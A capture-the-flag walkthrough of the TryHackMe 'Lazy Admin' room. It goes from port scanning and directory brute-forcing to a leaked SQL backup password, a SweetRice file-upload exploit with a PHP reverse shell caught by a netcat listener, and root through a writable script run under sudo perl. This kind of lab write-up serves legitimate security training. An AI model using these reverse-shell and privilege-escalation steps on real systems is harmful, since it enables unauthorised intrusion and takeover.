Nathanule's Write-ups
  • Nathanule's Write-Ups
  • Cheat sheets and Notes
    • Windows Privilege escalation
      • Communication with processes
      • Windows User Privileges
        • Windows Privilege Overview
        • SeImpersonate and SeAssignPrimaryToken
        • SeDebugPrivilege
    • SMTP
    • Directory brute-forcing (Fuzzing web directories)
    • Fuzzing Subdomains and Virtual hosts
    • Pivoting, Tunneling, and Port Forwarding
      • Pivoting around obstacles
      • Branching out our tunnels
      • Cheat sheets
    • Transferring Files
    • Powershell Notes
    • Active Directory Notes/Cheat sheets
      • Initial Enumeration
        • External Recon
          • Hunting E-mail addresses, usernames, credentials
      • External Information Gathering
  • Walk-throughs
    • HTB Windows Machines
      • APT
      • Mantis HTB
      • Reel HTB
      • Flight HTB
      • Visual HTB
      • Worker HTB
      • Fuse HTB
      • Buff HTB
      • Granny HTB
      • Grandpa HTB
      • Optimum HTB
      • Legacy
      • Jerry HTB
      • Silo HTB
      • Sizzle HTB
      • Tally HTB
      • Bart HTB
      • Jeeves HTB
    • HTB Linux Machines
      • Zipping HTB
      • devvortex HTB
      • Magic HTB
      • Bizness HTB
      • Sua
      • Mango HTB
      • Haircut HTB
      • Postman HTB
      • Friendzoned HTB
      • Mirai HTB
      • Networked HTB
      • Popcorn HTB
      • Posion HTB
      • Sunday HTB
      • SwagShop HTB
      • Irked HTB
      • Academy
    • HTB Endgames
      • Hades
      • Xen
      • P.O.O
      • Hololive THM
    • WPE Capstones
      • Querier HTB
      • Bastion HTB
      • Bastard HTB
      • Arctic HTB
      • Alfred THM
    • LPE Capstones
      • Brainpan 1 THM
      • ConvertMyVideo THM
      • Tomghost THM
      • Lazy Admin THM
      • Anonymous THM
    • Mobile
      • APKey
    • Snap-labs (Entry Level Pentesting)
    • Hardware
      • The needle
      • Debugging Interface
    • ICS and SCADA
      • Watersnake
    • Blockchain
      • Survival of the Fittest
Powered by GitBook
On this page
  • Port 80 Apache 2.4.18
  • Privilege Escalation via www-data
  1. Walk-throughs
  2. LPE Capstones

Lazy Admin THM

PreviousTomghost THMNextAnonymous THM

Last updated 1 year ago

IP

10.10.109.129

Nmap inital scan

sudo nmap -sV -sC -A -oA nmap_inital 10.10.109.129

Nmap full scan

nmap -p- -T5 10.10.109.129

Ports

22:SSH

80:HTTP

  • Most likely Apache2's default page

Port 80 Apache 2.4.18

When we navigate to http://10.10.109.129:80 we are greeted with the following.

  • This of itself is an information disclosure, we now know for sure we are dealing with a Ubuntu host.

Let's perform some directory busting and see if we can find anything interesting

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.109.129:80 -o dirs.txt

Within our results, we find a 

http://10.10.109.129/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql

when we download the MySQL backup file we can find a password hash.

cat mysql_bakup_20191129023059-1.5.1.sql | grep pass
Password123

Lets see if we can SSH into the target

  • It didntDidnt work

ssh admin@10.10.109.129

Back to our ferox results we do find a 

http://10.10.109.129/content/

  • seems like a website management system, it does mention a dashboard

back in our directory results we also find

http://10.10.109.129/content/as/

we can use our creds we found earlier

manager: Password123

we are bought to sweet rice's dashboard.

  • we do have the sweet rice version 1.5.1

having a quick google we can find this version is vulnerable to Arbitrary File Upload we can refer to the following

if we look at wappalyzer we can tell sweet rice uses PHP, meaning we can upload a PHP reverse shell and hopefully get shell on the system

For this, we can use pentest monkey's php reverse shell

we can use wget and download the file

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

then we need to modify the script slightly

Let's start a Netcat listener 

nc -lvnp 9005

we also need to change the php extention from .php to .php5 for the exploit to take effect

mv php-reverse-shell.php rev.php5

Now lets upload the file

within the Post -> create

we want to add a file

Now we can upload the file

when we navigate to 

http://10.10.109.129/content/attachment/

we will see our rev.php5 file sitting in the dictionary

when we click on the file, we should receive a call back from the target and establish a reverse shell.

Privilege Escalation via www-data

Lets stabilize our shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

first thing let's check our privileges

sudo -l

We can run Perl as sudo with no password on a specific file

backup.pl let's read the script and get a better idea of what it does

cat backup.pl

  • it looks like the script is using sh to execute another script

as you can see we have the write permission set meaning we can alter the file.

well simply edit the file and tell it to run bash

echo "/bin/bash" > /etc/copy.sh

now when we run 

sudo /usr/bin/perl /home/itguy/backup.pl

we have a root shell

we can take this hash to , we now have a password

https://crackstation.net/
https://www.exploit-db.com/exploits/40716
Logophp-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shellGitHub